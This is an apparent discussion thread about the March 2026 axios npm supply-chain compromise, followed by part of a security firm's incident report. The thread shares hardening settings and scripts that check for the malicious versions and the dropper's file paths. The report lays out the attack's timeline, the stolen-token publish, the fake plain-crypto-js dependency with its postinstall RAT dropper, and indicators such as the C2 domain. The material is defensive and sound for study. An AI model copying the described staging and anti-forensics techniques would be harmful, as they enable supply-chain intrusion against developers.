You should probably set your default to not run those scripts. They are mostly unnecessary.
~/.npmrc :
ignore-scripts=true
83M weekly downloads! The anti-forensics here are much more complicated than I had imagined. Sharing after getting my hands burned.
After the RAT deploys, setup.js deletes itself and swaps package.json with a clean stub. Your node_modules looks fine. Only way to know is checking for artifacts: /Library/Caches/com.apple.act.mond on mac, %PROGRAMDATA%\wt.exe on windows, /tmp/ld.py on linux. Or grep network logs for sfrclak.com.
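A quick way to sweep a machine for those artifact paths (a minimal sketch; the paths are the IoCs listed above, and checking network logs for sfrclak.com is left to your proxy/firewall):

```shell
# Sweep for the dropper's artifact paths listed above (IoCs from the report).
# PROGRAMDATA only exists on Windows; the fallback keeps this portable.
hits=""
for f in "/Library/Caches/com.apple.act.mond" \
         "${PROGRAMDATA:-/nonexistent}/wt.exe" \
         "/tmp/ld.py"; do
  if [ -e "$f" ]; then hits="$hits $f"; fi
done
if [ -n "$hits" ]; then echo "SUSPICIOUS:$hits"; else echo "clean"; fi
```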
Somehow nobody is worried about how agentic coding tools run npm install autonomously. No human in the loop to notice a weird new transitive dep. That attack surface is just getting worse day by day.
Website: https://asfaload.com/
Also from the report:
> Neither malicious version contains a single line of malicious code inside axios itself. Instead, both inject a fake dependency, plain-crypto-js@4.2.1, a package that is never imported anywhere in the axios source, whose only purpose is to run a postinstall script that deploys a cross-platform remote access trojan (RAT)
Good news for pnpm/bun users who have to manually approve postinstall scripts.
I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default.
Here's how to set global configs to set min release age to 7 days:
~/.config/uv/uv.toml
exclude-newer = "7 days"
~/.npmrc
min-release-age=7 # days
ignore-scripts=true
~/Library/Preferences/pnpm/rc
minimum-release-age=10080 # minutes
~/.bunfig.toml
[install]
minimumReleaseAge = 604800 # seconds
(Side note: it's wild that npm, bun, and pnpm have all decided to use different time units for this configuration.)

If you're developing with LLM agents, you should also update your AGENTS.md/CLAUDE.md file with some guidance on how to handle failures stemming from this config, as they will cause the agent to unproductively spin its wheels.
I have bwrap configured to override: npm, pip, cargo, mvn, gradle, everything you can think of and I only give it the access it needs, strip anything that is useless to it anyway, deny dbus, sockets, everything. SSH is forwarded via socket (ssh-add).
This limits the blast radius to your CWD and package manager caches and often won't even work since the malware usually expects some things to be available which are not in a permissionless sandbox.
You can think of it as running a Docker container, but without needing an image. It is the same thing flatpak is based on.
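For reference, a minimal bwrap invocation along these lines might look like this (a sketch, not the parent commenter's exact setup; the flags are real bwrap options but the specific mount choices are illustrative):

```shell
# Build a bwrap command that exposes the toolchain read-only and the
# current directory read-write; dbus, $HOME, and host sockets are absent.
# Flag names are real bwrap options; the mount choices are illustrative.
sandbox="bwrap --die-with-parent --unshare-all --share-net \
  --ro-bind /usr /usr --symlink usr/bin /bin --symlink usr/lib /lib \
  --proc /proc --dev /dev --tmpfs /tmp \
  --bind $PWD $PWD --chdir $PWD"
# Usage would then be e.g.: $sandbox npm install
echo "$sandbox npm install"
```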
As for server deployments, container hardening is your friend. Most supply chain attacks target build scripts so as long as you treat your CI/CD as an untrusted environment you should be good - there's quite a few resources on this so won't go into detail.
Bonus points: use the same sandbox for AI.
Stay safe out there.
It’s things like this that make me want to swap to Qubes permanently, simply so as not to have my password manager in the same context as compiling software, ever.
— Run Yarn in zero-installs mode (or equivalent for your package manager). Every new or changed dependency gets checked in.
— Disable post-install scripts. If you don’t, at least make sure your package manager prompts for scripts during install, in which case you stop and look at what it’s going to run.
— If third-party code runs in development, including post-install scripts, try your best to make sure it happens in a VM/container.
— Vet every package you add. Popularity is a plus, recent commit time is a minus: if you have this but not that, keep your eyes peeled. Skim through the code on NPM (they will probably never stop labelling it as “beta”), commit history and changelog.
— Vet its dependency tree. Dependencies is a vector for attack on you and your users, and any new developer in the tree is another person you’re trusting to not be malicious and to take all of the above measures, too.
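For the "disable scripts but allow the ones you've inspected" step, pnpm has a real mechanism for this: its `onlyBuiltDependencies` field in package.json acts as an explicit allowlist (the `esbuild` entry below is just an example):

```json
{
  "pnpm": {
    "onlyBuiltDependencies": ["esbuild"]
  }
}
```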
We have libraries like SQLite, which is a single .c file that you drag into your project and it immediately does a ton of incredibly useful, non-trivial work for you, while barely increasing your executable's size.
The issue is not dependencies themselves, it's transitive ones. Nobody installs left-pad or is-even-number directly, and "libraries" like these are the vast majority of the attack surface. If you get rid of transitive dependencies, you get rid of the need for a package manager, as installing a package becomes unzipping a few files into a vendor/ folder.
There's so many C libraries like this. Off the top of my head, SQLite, FreeType, OpenSSL, libcurl, libpng/jpeg, stb everything, zlib, lua, SDL, GLFW... I do game development so I'm most familiar with the ones commonly used in game engines, but I'm sure other fields have similarly high quality C libraries.
They also have bindings for every language under the sun. Rust libraries are very rarely used outside of Rust, and C#/Java/JS/Python libraries are never used outside their respective language (aside from Java ones in other JVM langs).
All it takes is an `npm config set` to switch registries anyways. The hard part is having a central party that is able to convince all the various security companies to collaborate rather than having dozens of different registries each from each company.
Rather than just a hard-coded delay, I think having policies on what checks must pass first makes sense with overrides for when CVEs show up.
(WIP)
This is why corporations doing it right don't allow installing the Internet into dev machines.
Yet everyone gets to throw their joke about PC virus, while having learnt nothing from it.
Now, I tend to use Python, Rust and Julia. With Python I am constantly using the same few packages, like numpy and matplotlib. With Rust and Julia, I try as much as possible to not use any packages at all, because it always scares me when something that should be pretty simple downloads half of the Internet to my PC.
Julia is even worse than Rust in that regard - for even rudimentary stuff like static arrays or properly namespaced enums people download 3rd party packages.
Edit: bottom line is installs are gonna get SOOO much more complicated. You can already see the solution surface... Cooling periods, maintainer profiling, sandbox detonation, lockfile diffing, weird publish path checks. All adds up to one giant PITA for fast easy dev.
For anyone wondering, you need to be on npm >= 11.10.0 in order to use it. It just became available Feb 11 2026
Idk, lockfiles provide almost as good protection without putting the binaries in git. At least with the `--frozen-lockfile` option.
My feelings precisely. Min package age (supported in uv and all JS package managers) is nice but I still feel extremely hesitant to upgrade my deps or start a new project at the moment.
I don’t think this is going to stabilize any time soon, so figuring out how to handle potentially compromised deps is something we will all need to think about.
1. Packages should carry a manifest that declares what they do at build time, just like Chrome extensions do. This manifest would then be used to configure its build environment.
2. Publishers to official registries should be forced to use 2FA. I proposed this a decade ago for crates.io and people lost their minds, like I was suggesting we drag developers to a shed to be shot.
3. Every package registry should produce a detailed audit log that contains a "who, what, when". Every build/ command should be producing audit logs that can be collected by endpoint agents too.
4. Every package registry should support TUF.
5. Typosquatting defenses should be standard.
etc etc etc. Some of this is hard, some of this is not hard. All of this is possible. No one has done it, so it's way too early to say "package managers can't be made safe" when no one has tried.
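To make point 1 concrete, such a manifest might look something like this (purely hypothetical field names; nothing like this exists in npm today, it's just an illustration of the idea):

```json
{
  "name": "example-package",
  "buildManifest": {
    "lifecycleScripts": "none",
    "network": [],
    "filesystemWrites": ["./build"]
  }
}
```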
What is a problem is library quality. Which is downstream of nobody getting paid for it, combined with an optimistic but unrealistic "all packages are equal" philosophy.
> High quality C libraries
> OpenSSL
OpenSSL is one of the ones where there's a ground up rewrite happening because the code quality is so terrible while being security critical.
On the other end, javascript is uniquely bad because of the deployment model and difficulty of adding things to the standard library, so everything is littered with polyfills.
I'm not sure why you believe this is more secure than a package manager. At least with a package manager there is an opportunity for vetting. It's also simply not true that it barely increases your executable's size: if your executable depends on it, it increases its effective size.
A much better approach would be to pin the versions used and do intentional updates some time after release, say a sprint after.
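npm's real `save-exact` option helps with the pinning half of this: versions get recorded exactly (`1.14.0`, not `^1.14.0`) and only move when you deliberately update:

```ini
# ~/.npmrc
save-exact=true
```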
And with LLMs generating more and more code, the risk of copying old setups increases.
People are lazy. And sometimes they find old stuff via a google search and use that.
Given how HTTP is now what TCP was during the 90s, with almost all modern networked applications needing to communicate over it one way or another, most Rust projects come with an inherent security risk.
These days, I score the usability of programming languages by how complete their standard library is. By that measure, Rust and Javascript get an automatic F.
Doesn’t npm mandate 2FA as of some time last year? How was that bypassed?
Fetch wasn't added to Node.js as a core package until version 18, and wasn't considered stable until version 21. Axios has been around much longer and was made part of popular frameworks and tutorials, which helps continue to propagate its usage.
Would they not have approved it for earlier versions? But also, wouldn't the chance of automatic approval for an addition be high (for such a widely used project)?
First day with javascript?
If no one checks their dependencies, the solution is to centralize this responsibility at the package repository. Something like left-pad should simply not be admitted to npm. Enforce a set of stricter rules which only allow non-trivial packages maintained by someone who is clearly accountable.
Another change one could make is develop bigger standard libraries with all the utilities which are useful. For example in Rust there are a few de facto standard packages one needs very often, which then also force you to pull in a bunch of transitive dependencies. Those could also be part of the standard library.
This all amounts to increasing the minimal scope of useful functionality a package has to have to be admitted and increasing accountability of the people maintaining them. This obviously comes with more effort on the maintainers part, but hey maybe we could even pay them for their labor.
But maybe that's not the right fit either. The world where package managers are just open to whatever needs to die. It's no longer a safe model.
It's also a little context dependent, for example if I was using Axios and I see a prompt to run the plain-crypto-js postinstall script, alarm bells would instantly ring, which would at least make me look up the changelog to see why this is happening.
In most cases I don't even let them run unless something breaks/doesn't work as expected.
~/.yarnrc.yml
npmMinimalAgeGate: "3d"

Unfortunately npm is friggen awful at this...
You can use --ignore-scripts=true to disable all scripts, but inevitably, some packages will absolutely need to run scripts. There's no way to allowlist specific scripts to run, while blocking all others.
There are third-party npm packages that you can install, like @lavamoat/allow-scripts, but to use these you need to use an entirely different command like `npm setup` instead of the `npm install` everyone is familiar with.
This is just awful in so many ways, and it'd be so easy for npm to fix.
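For reference, @lavamoat/allow-scripts reads its allowlist from a `lavamoat.allowScripts` field in package.json, keyed per package (the package names below are just examples):

```json
{
  "lavamoat": {
    "allowScripts": {
      "keccak": true,
      "some-untrusted-pkg": false
    }
  }
}
```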
There are pretty much exactly 3000 deleted issues, with the range starting at https://github.com/axios/axios/issues/7547 (7547) and ending at https://github.com/axios/axios/issues/10546 (10546 which is 7547+2999)
Maybe just a coincidence but they have cubic-dev-ai edit every single PR with a summary. And that bot edits PR descriptions even for outside contributors.
I'm not dogmatic about the whole "JS for the backend is sin" from backend folks, but it seems like it was the right call. You should stick to large org backed packages, or languages with good enough standard libraries, like Go, Java, Python, C#.
I wrongly thought that the verified provenance UI showed a package has a trusted publishing pipeline, but seems it’s orthogonal.
NPM really needs to move away from these secrets that can be stolen.
Another obvious ChatGPT-ism. The fact that people are using AI to write these security posts doesn't surprise me, but the fact they use it to write a verbose article with spicy little snippets that LLMs seem to prefer does make it really hard to appreciate anything other than the simple facts in the article.
Yet another case in point for "do your own writing" (https://news.ycombinator.com/item?id=47573519)
Project: https://point-wild.github.io/who-touched-my-packages/
That way, I can at least limit the blast radius when (not if) I catch an infostealer.
However, it’s an extra line of defence against
1) your registry being down (preventing you from pushing a security hotfix when you find out another package compromised your product),
2) package unpublishing attacks (your install step fails or asks you to pick a replacement version, what do you do at 5pm on a Friday?), and
3) possibly (but haven’t looked in depth) lockfile poisoning attacks, by making them more complicated.
Also, it makes the size of your dependency graph (or changes therein) much more tangible and obvious, compared to some lines in a lockfile.
https://github.com/npm/cli/pull/8965
https://github.com/npm/cli/issues/8994
It's good that they finally got there but....
I would be avoiding npm itself on principle in the JS ecosystem. Use a package manager that has a history of actually caring about these issues in a timely manner.
(Of course I could still get bitten if one of the packages I trust has its postinstall script replaced.)
Absolute nonsense. What does automated world even mean? Even if one could infer reasonably, it's no justification. Appealing to "the real world" in lieu of any further consideration is exactly the kind of mindlessness that has led to the present state of affairs.
Automation of dependency versions was never something we needed it was always a convenience, and even that's a stretch given that dependency hell is abundant in all of these systems, and now we have supply chain attacks. While everyone is welcome to do as they please, I'm going to stick to vendoring my dependencies, statically compiling, and not blindly trusting code I haven't seen before.
This is what happens when there is no barrier to entry: it puts everyone who has no idea what they are doing in charge of the NPM community.
When you see a single package having +25 dependencies, that is a bad practice and increases the risk of supply chain attacks.
Most of them don't even pin their dependencies and I called this out just yesterday on OneCLI. [0]
It just happens that NPM is the worst out of all of the rest of the ecosystems due to the above.
That model effectively becomes your ring 1. Ring 0 is the stdlib and the package manager itself, and - because you would always need to be able to step outside the distribution for either freshness or "that's not been picked up by the distro yet" reasons - the ecosystem package repositories are the wild west ring 2.
In the language ecosystems I'm only aware of Quicklisp/Ultralisp and Haskell's Stackage that work like this. Everything else is effectively a rolling distro that hasn't realised that's what it is yet.
You are just swapping a package manager with security by obscurity by copy pasting code into your project. It is arguably a much worse way of handling supply chain security, as now there is no way to audit your dependencies.
> If you get rid of transitive dependencies, you get rid of the need of a package manager
This argument makes no sense. Obviously reducing the amount of transitive dependencies is almost always a good thing, but it doesn't change the fundamental benefits of a package manager.
> There's so many C libraries like this
The language with the most fundamental and dangerous ways of handling memory, the language that is constantly in the news for numerous security problems even in massively popular libraries such as OpenSSL? Yes, definitely copy-paste that code in, surely nothing can go wrong.
> They also bindings for every language under the sun. Rust libraries are very rarely used outside of Rust
This is a WILD assumption, doing C-style bindings is actually quite common. You will of course then also be exposing a memory unsafe interface, as that is what you get with C.
What exactly is your argument here? It feels like what you are trying to say is that we should just stop doing JS and instead all make C programs that copy paste massive libraries because that is somehow 'high quality'.
This seems like a massively uninformed, one-sided and frankly ridiculous take.
These are so much better than the interface fetch offers you, unfortunately.
Maybe I misunderstood this point. But the ssh socket also gives access to your private keys, so I see no security gain in that point. Better to have a password protected key.
Axios has like 100M downloads per week. A couple of people with MFA should have to approve changes before it gets published.
- copy the dependencies' tests into your own tests
- copy the code in to your codebase as a library using the same review process you would for code from your own team
- treat updates to the library in the same way you would for updates to your own code
Apparently, this extra work will now not be a problem, because we have AI making us 10x more efficient. To be honest, even without AI, we should've been doing this from the start, even if I understand why we haven't. The excuses are starting to wear thin though.
The solution to this is twofold, and is already implemented in the primary ecosystems being targeted (Python and JS): packagers should use Trusted Publishing to eliminate the need for long lived release credentials, and downstreams should use cooldowns to give security researchers time to identify and quarantine attacks.
(Security is a moving target, and neither of these techniques is going to work indefinitely without new techniques added to the mix. But they would be effective against the current problems we’re seeing.)
I've been working on Proof of Resilience, a set of 4 metrics for OSS, and using that as a scoring oracle for what to fund.
Popularity metrics like downloads, stars, etc are easy to fake today with ai agents. An interesting property is that gaming these metrics produces better code, not worse.
These are the 4 metrics:
1. Build determinism - does the published artifact match a reproducible build from source?
2. Fuzzing survival - does the package survive fuzz testing?
3. Downstream stability - does it break any repos dependent on this project when pushing a release?
4. Patch velocity - how fast are fixes merged?
Here's a link to the post, still early but would appreciate any feedback.
What a great time to be alive! Now, that's exactly why I enjoy writing software with minimal dependencies for myself (and sometimes for my family and friends) in my spare time - first, it's fun, and second, turns out it's more secure.
I just wish it had more human interaction rather than have a GenAI spit out the blog post. It's very repetitive and includes several EM dashes.
If your first party tooling contains all the functionality you typically need, it's possible you can be productive with zero 3rd party dependencies. In practice you will tend to have a few, but you won't be vendoring out critical things like HTTP, TCP, JSON, string sanitation, cryptography. These are beacons for attackers. Everything depends on this stuff so the motivation for attacking these common surfaces is high.
I can literally count on one hand the number of 3rd party dependencies I've used in the last year. Dapper is the only regular thing I can come up with. Sometimes ScottPlot. Both of my SQL providers (MSSQL and SQLite) are first party as well. This is a major reason why they're the only sql providers I use.
Maybe I am just so traumatized from compliance and auditing in regulated software business, but this feels like a happier way to build software too. My tools tend to stay right where I left them the previous day. I don't have to worry about my hammer or screw drivers stealing all my bitcoin in the middle of the night.
Dealing with dependencies is another question; if it's stupid stuff like leftpad then it should be either vendored in or promoted to be a language feature anyway (as it has been).
This needs to be done (as we've seen from these recent attacks) in your devenv, ci/cd and prod environments. Not one, or two, but all of these environments.
The easiest way is using something like kubernetes network policies + a squid proxy to allow limited trusted domains through, and those domains must not be publicly controllable by attackers. e.g. github.com is not safe to allow, but raw.githubusercontent.com would be, as it doesn't allow data to be submitted to it.
Network firewalls that perform SSL interception and restrict DNS queries are an option also, though more complicated or expensive than the above.
This stops both DNS exfil and HTTP exfil. For your devenv, software like Little Snitch may protect you from these (I'm not 100% on DNS exfil here though). Otherwise run your devenv (i.e. vscode) as a web server, or containerised + VNC, a VM, etc., with the same restrictions.
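A minimal sketch of the NetworkPolicy half of that setup (default-deny egress except DNS and the proxy; the namespace scoping and pod labels are assumptions):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: egress-via-proxy-only
spec:
  podSelector: {}            # applies to all pods in the namespace
  policyTypes: ["Egress"]
  egress:
    - to:                    # only the squid proxy (label is an assumption)
        - podSelector:
            matchLabels:
              app: squid-proxy
    - ports:                 # allow DNS lookups
        - protocol: UDP
          port: 53
```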
Wouldn’t that just encourage the bad actors to delay the activation of their payloads a few days or even remotely activated on a switch?
find / -path '*/node_modules/axios/package.json' -type f 2>/dev/null | while read -l f; set -l v (grep -oP '"version"\s*:\s*"\K(1\.14\.1|0\.30\.4)' $f 2>/dev/null); if test -n "$v"; printf '\a\n\033[1;31m FOUND v%s\033[0m \033[1;33m%s\033[0m\n' $v (string replace '/package.json' '' -- $f); else; printf '\r\033[2m scanning: %s\033[K\033[0m' (string sub -l 70 -- $f); end; end; printf '\r\033[K\n\033[1;32m scan complete\033[0m\n'

Zero deps. One file. Already detects the hijacked maintainer email on the current safe version.
github.com/nfodor/npm-supply-chain-audit
Because axios existed before the builtin fetch, and so there's a lot of stackoverflow answers explaining how to use fetch, and the llm models are trained on that, so they will write axios requests instead of fetch
You can remember this answer for every time you ask same question again:
"Coz whatever else/builtin was before was annoying enough for common use cases"
7 days gives ample time for security scanning, too.
Which will never even come close to happening, unless npm decides to make it the default, which they won't.
~/.npmrc
min-release-age=7 # days
actually doesn't set it at all, please edit your comment.

EDIT: Actually maybe it does? But it's weird because
`npm config list -l` shows: `min-release-age = null` with, and without the comment. so who knows ¯\_(ツ)_/¯
GB's of libre software, graphical install, 2.6 kernel, KDE3 desktop, very light on my Athlon 2000 with 256MB of RAM. It was incredible compared to what you got with Windows XP at 120 euros per seat: nonfree software and an almost empty system.
And, well, if for instance I could get a read-only, ~16TB durable USB drive with tons of Guix packages offline (on a two-year basis with stable releases) for $200, I would buy it on the spot.
You would say that $200 for a distro is expensive, but for what it provides, if you are only interested in libre gaming and tools, the amount you save can be huge. I've seen people spend $400 on Steam games because of the holiday sales...
In general, management was to see progress. I've come to find that technical details like these are an afterthought for most engineers, so far as the deadlines are being met.
It's one of these things that are under the water, tech side jobs. Everyone has to be on board, if your peers don't give a fuck you're just an annoyance and will be swimming counter-current.
With AI agents the volume and frequency of supply chain attacks is going to explode. I think our entire notion of how to develop and distribute software safely needs to change. I don't have answers; "reflections on trusting trust" explains the difficulties we now face.
Also, considering how prevalent TPM/Secure Enclaves are on modern devices, I would guess most package maintainers already have hardware capable of generating/using signing keys that never leave hardware.
I think it is mostly a devex/workflow question.
Considering the recent ci/cd-pipeline compromises, I think it would make sense to make a two phase commit process required for popular packages. Build and upload to the registry from a pipeline, but require a signature from a hardware resident key before making the package available.
Maybe not all users should pull all packages straight from what devs are pushing.
There's no reason we can't have "node package distributions" like we have Linux distributions. Maybe we should stop expecting devs and maintainers and Microsoft to take responsibility for our supply-chain.
There's no community, the users of axios are devs that looked at stackoverflow for "how to download a file in javascript", they barely know or care what axios is.
Now the users of axios are devs that ask Claude Code or Codex to scrape a website or make a dashboard, they don't even know about the word axios.
I personally had to delete axios a couple of times from my codebase when working with junior devs.
You should try writing code, and not relying on libraries for everything, it may change how you look at programming and actually ground your opinions in reality. I'm staring at company's vendor/ folder. It has ~15 libraries, all but one of which operate on trusted input (game assets).
> fundamental benefits of a package manager.
I literally told you why they don't matter if you write code in a sane way.
> doing C-style bindings is actually quite common
I know bindings for Rust libraries exist. Read the literal words you quoted. "Rust libraries are very rarely used outside of Rust". Got some counterexamples?
It's herd immunity, not personal protection. You benefit from the people who DO install immediately and raise the alarm
As a higher-level alternative to bwrap, I sometimes use `flatpak run --filesystem=$PWD --command=bash org.freedesktop.Platform`. This is kind of an abuse of flatpaks but works just fine to make a sandbox. And unlike bwrap, it has sane defaults (no extra permissions, not even network, though it does allow xdg-desktop-portal).
Since the attacker had full control of the NPM account, it is game over - the attacker can login to NPM and could, if they wanted, configure Trusted Publishing on any repo they control.
Axios IS using trusted publishing, but that didn't do anything to prevent the attack since the entire NPM account was taken over and config can be modified to allow publishing using a token.
"it's not just a waste of money — it's a security problem"
I am really passionate about these things, but I am not going to read something which you haven't written. Even sharing a prompt/rough-sketches/raw-writing might be beneficial but I recommend writing it by-hand man, we are all burnt out reading AI slop, I can't read more AI
1. They are not going to include everything. This includes things like new file formats.
2. They are going to be out of date whenever a standard changes (HTML, etc.), application changes (e.g. SQLite/PostgreSQL/etc. for SQL/ORM bindings), or API changes (DirectX, Vulcan, etc.).
3. Things like data structures, graphics APIs, etc. will have performance characteristics that may be different to your use case.
4. They can't cover all nice use cases such as the different libraries and frameworks for creating games of different genres.
For example, Python's XML DOM implementation only implements a subset of XPath and doesn't support parsing HTML.
The fact that Python, Java, and .NET have large library ecosystems proves that even if you have a "Batteries Included" approach there will always be other things to add.
Unless you are Python, where the standard library includes multiple HTTP libraries and everyone installs the requests package anyways.
Few languages have good models for evolving their standard library, so you end up with lots of bad designs sticking around forever. Libraries are much easier to evolve, giving them the advantage in terms of developer UX and performance.
I think packages of a certain size need to be held to higher standards by the repositories. Multiple users should have to approve changes. Maybe enforced scans (though with trivy’s recent compromise that wont be likely any time soon)
Basically, right now a lone developer can decide to send something out on a whim that will run on millions of machines.
I understand why this doesn't work well with legacy projects, but it's something that the language could strive towards.
It's true that system repos doesn't include everything, but you can create your own repositories if you really need to for a few things. In practice Fedora/EPEL are basically sufficient for my needs. Right now I'm deploying something with yocto, which is a bit more limited in slection, but it's pretty easy to add my own packages and it at least has hashes so things don't get replaced without me noticing (to be fair, I don't know if the security practices of open-embedded recipes are as strong as Fedora...).
I kind of feel like the authors here should want that for themselves, before the community would even realize it's needed. I can't say I've worked on packages that are as popular as axios, but once some packages we were publishing hit 10K downloads or so, we all agreed that we needed to up our security posture, and we all got hardware keys for 2FA and spent 1-2 weeks on making sure it was as bullet-proof we could make it.
To be fair, most FOSS is developed by volunteers so I understand not wanting to spend any money on something you provide for free, but on the other hand, I personally wouldn't feel comfortable being responsible for something that popular without hardening my own setup as much as I could, even if it means stopping everything for a week.
Even left-pad is still getting 1.6 million weekly downloads.
fetch('https://api.example.com/data', {
  headers: {
    'Authorization': 'Bearer ' + accessToken
  }
})

I don't think there are great solutions here. Arguably, units should be supported by the config file format, but existing config file formats don't do that.
StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.
axios is the most popular JavaScript HTTP client library with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.
There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.
This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.
These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.
StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We'll walk through the full attack chain, indicators of compromise, remediation steps, and open it up for Q&A.
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
| Timestamp (UTC) | Event |
|---|---|
| 2026-03-30 05:57 | plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection. |
| 2026-03-30 23:59 | plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: "node setup.js" hook and obfuscated dropper are introduced. |
| 2026-03-31 00:21 | axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base. |
| 2026-03-31 01:00 | axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines. |
| 2026-03-31 ~03:15 | npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document's modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API. |
| 2026-03-31 03:25 | npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub. |
| 2026-03-31 04:26 | npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice. |
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.
Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.
A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:
// axios@1.14.0 — LEGITIMATE
"_npmUser": {
"name": "GitHub Actions",
"email": "npm-oidc-no-reply@github.com",
"trustedPublisher": {
"id": "github",
"oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
}
}
// axios@1.14.1 — MALICIOUS
"_npmUser": {
"name": "jasonsaayman",
"email": "ifstap@proton.me"
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}
There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.
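This provenance gap is machine-checkable. A minimal sketch (the helper name `untrustedVersions` is ours; the field names follow the registry metadata excerpts shown above, as returned by the standard registry endpoint `https://registry.npmjs.org/<package>`):

```javascript
// Sketch: flag versions in an npm registry document that were published
// WITHOUT an OIDC Trusted Publisher binding. Field names mirror the
// metadata excerpts above; this is an illustrative helper, not an official API.
function untrustedVersions(versions) {
  return Object.entries(versions)
    .filter(([, meta]) => !meta._npmUser?.trustedPublisher) // no OIDC binding
    .map(([version]) => version);
}

// Example using the two metadata excerpts above:
const versions = {
  "1.14.0": { _npmUser: { name: "GitHub Actions", trustedPublisher: { id: "github" } } },
  "1.14.1": { _npmUser: { name: "jasonsaayman", email: "ifstap@proton.me" } }
};
console.log(untrustedVersions(versions)); // → [ '1.14.1' ]
```

A check like this, run against the `versions` map of the registry document, would have isolated 1.14.1 immediately — the only 1.x release with no Trusted Publisher binding.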
Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:
- Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository
- Declares "postinstall": "node setup.js" — the hook that fires the RAT dropper on install
- Ships a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history: a clean package in the registry that makes nrwise look like a legitimate maintainer.
A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:
| File | In 4.2.0 | In 4.2.1 | Change |
|---|---|---|---|
| package.json | No scripts section | "postinstall": "node setup.js" added | Modified: weapon added |
| setup.js | Not present | 4.2 KB obfuscated dropper | Added: the RAT dropper |
| package.md | Not present | Clean JSON stub reporting version 4.2.0 | Added: the anti-forensics cover |
